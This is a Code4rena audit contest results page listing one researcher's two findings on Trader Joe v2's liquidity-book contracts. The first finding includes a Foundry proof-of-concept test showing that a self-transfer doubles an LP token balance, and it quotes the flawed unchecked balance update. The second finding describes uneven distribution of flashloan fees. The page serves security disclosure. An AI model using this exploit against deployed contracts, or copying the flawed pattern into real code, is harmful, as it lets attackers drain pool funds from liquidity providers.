Trader Joe v2 contest - parashar's results

One-stop-shop decentralized trading on Avalanche.

General Information

Platform: Code4rena

Start Date: 14/10/2022

Pot Size: $100,000 USDC

Total HM: 12

Participants: 75

Period: 9 days

Judge: GalloDaSballo

Total Solo HM: 1

Id: 171

League: ETH

Trader Joe

Findings Distribution

Researcher Performance

Rank: 33/75

Findings: 2

Award: $69.83

🌟 Selected for report: 0

🚀 Solo Findings: 0

Findings Information

Awards

0.3268 USDC - $0.33

Labels

bug
3 (High Risk)
satisfactory
duplicate-299

External Links

Lines of code

https://github.com/code-423n4/2022-10-traderjoe/blob/main/src/LBToken.sol#L189

Vulnerability details

Impact

A user can keep transferring tokens to himself, doubling his balance on each transfer; as a result, with the manipulated LP balance he can withdraw pool tokens.

Proof of Concept

Run this test in LBToken.t.sol; it passes, essentially doubling DEV's balance.

function testSafeTransferToSelf() public {
    uint256 amountIn = 1e18;
    (uint256[] memory _ids, , , ) = addLiquidity(amountIn, ID_ONE, 5, 0);
    // Record DEV's LP balance in each of the 5 bins that received liquidity
    uint256[] memory amounts = new uint256[](5);
    for (uint256 i; i < 5; i++) {
        assertEq(pair.userPositionAtIndex(DEV, i), _ids[i]);
        amounts[i] = pair.balanceOf(DEV, _ids[i]);
    }
    assertEq(pair.userPositionNumber(DEV), 5);
    assertEq(pair.balanceOf(DEV, ID_ONE - 1), amountIn / 3);
    emit TransferSingle(DEV, DEV, ALICE, _ids[0], amounts[0]);
    // DEV transfers its full balance of the first bin to itself
    pair.safeTransferFrom(DEV, DEV, _ids[0], amounts[0]);
    // The balance is now double what it was before the self-transfer
    assertEq(pair.balanceOf(DEV, _ids[0]), 2*amounts[0]);
}

Tools Used

Foundry

https://github.com/code-423n4/2022-10-traderjoe/blob/main/src/LBToken.sol#L189

unchecked {
    _balances[_id][_to] = _toBalance + _amount;
    _balances[_id][_from] = _fromBalance - _amount;
}
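The self-transfer behaviour asserted by the test above, reduced to a minimal model next to a hardened variant. This is an added example, not part of the original report and not Trader Joe's code: the contract and function names are hypothetical, access control is omitted, and it assumes both balances are read before either slot is written, with the recipient's slot written last.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

/// Simplified model with hypothetical names; not Trader Joe's LBToken.
/// Approval and ownership checks are omitted to isolate the balance update.
contract CachedBalanceToken {
    // id => account => balance, mirroring the _balances[_id][_account] layout quoted above
    mapping(uint256 => mapping(address => uint256)) internal _balances;

    function mint(address to, uint256 id, uint256 amount) external {
        _balances[id][to] += amount;
    }

    function balanceOf(address account, uint256 id) external view returns (uint256) {
        return _balances[id][account];
    }

    /// Vulnerable pattern: both balances are cached before either slot is written.
    function transferCached(address from, address to, uint256 id, uint256 amount) external {
        uint256 fromBalance = _balances[id][from];
        require(fromBalance >= amount, "insufficient balance");
        uint256 toBalance = _balances[id][to]; // same slot as fromBalance when from == to
        unchecked {
            _balances[id][from] = fromBalance - amount;
            // When from == to this overwrites the debit with the stale value plus amount,
            // so a self-transfer of the full balance leaves 2 * balance.
            _balances[id][to] = toBalance + amount;
        }
    }

    /// Hardened variant (one possible fix): reject self-transfers and
    /// credit the recipient from storage after the debit has been written.
    function transferChecked(address from, address to, uint256 id, uint256 amount) external {
        require(from != to, "self-transfer");
        uint256 fromBalance = _balances[id][from];
        require(fromBalance >= amount, "insufficient balance");
        unchecked {
            _balances[id][from] = fromBalance - amount; // cannot underflow: checked above
        }
        _balances[id][to] += amount; // fresh read of the slot, checked addition
    }
}
```

Either guard alone is enough to stop the inflation; the in-place `+=` also keeps total supply constant if a self-transfer is ever allowed.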

#0 - trust1995

2022-10-23T21:37:54Z

Dup of #422

#1 - GalloDaSballo

2022-10-26T16:35:59Z

#2 - c4-judge

2022-11-23T18:28:37Z

GalloDaSballo marked the issue as not a duplicate

#3 - c4-judge

2022-11-23T18:29:19Z

GalloDaSballo marked the issue as duplicate of #299

#4 - Simon-Busch

2022-12-05T06:39:14Z

Marked this issue as Satisfactory as requested by @GalloDaSballo

Findings Information

🌟 Selected for report: shung

Also found by: 0x52, KingNFT, Trust, parashar, philogy, rvierdiiev

Labels

bug
2 (Med Risk)
satisfactory
duplicate-136

Awards

69.4984 USDC - $69.50

External Links

Lines of code

https://github.com/code-423n4/2022-10-traderjoe/blob/main/src/LBPair.sol#L452

Vulnerability details

Impact

Flashloan fees not distributed to LP correctly

Proof of Concept

When a flashloan is taken, reserves across various bins are used, but when fees are distributed, they are only distributed to the LPs of the active bin id, which can be used by a contract using the flashloan to minimize the fees it pays.

Tools Used

While distributing fees, it should distribute based on reserves used across bins.

#0 - Shungy

2022-10-23T21:13:22Z

I believe this finding to be valid. However, the report is lacking in elaborating the issue.

Duplicate: https://github.com/code-423n4/2022-10-traderjoe-findings/issues/136

#1 - GalloDaSballo

2022-10-26T17:03:03Z

#2 - c4-judge

2022-11-13T17:19:51Z

GalloDaSballo marked the issue as satisfactory

#3 - c4-judge

2022-11-16T21:53:36Z

GalloDaSballo marked the issue as not a duplicate

#4 - c4-judge

2022-11-16T21:53:43Z

GalloDaSballo marked the issue as duplicate of #136
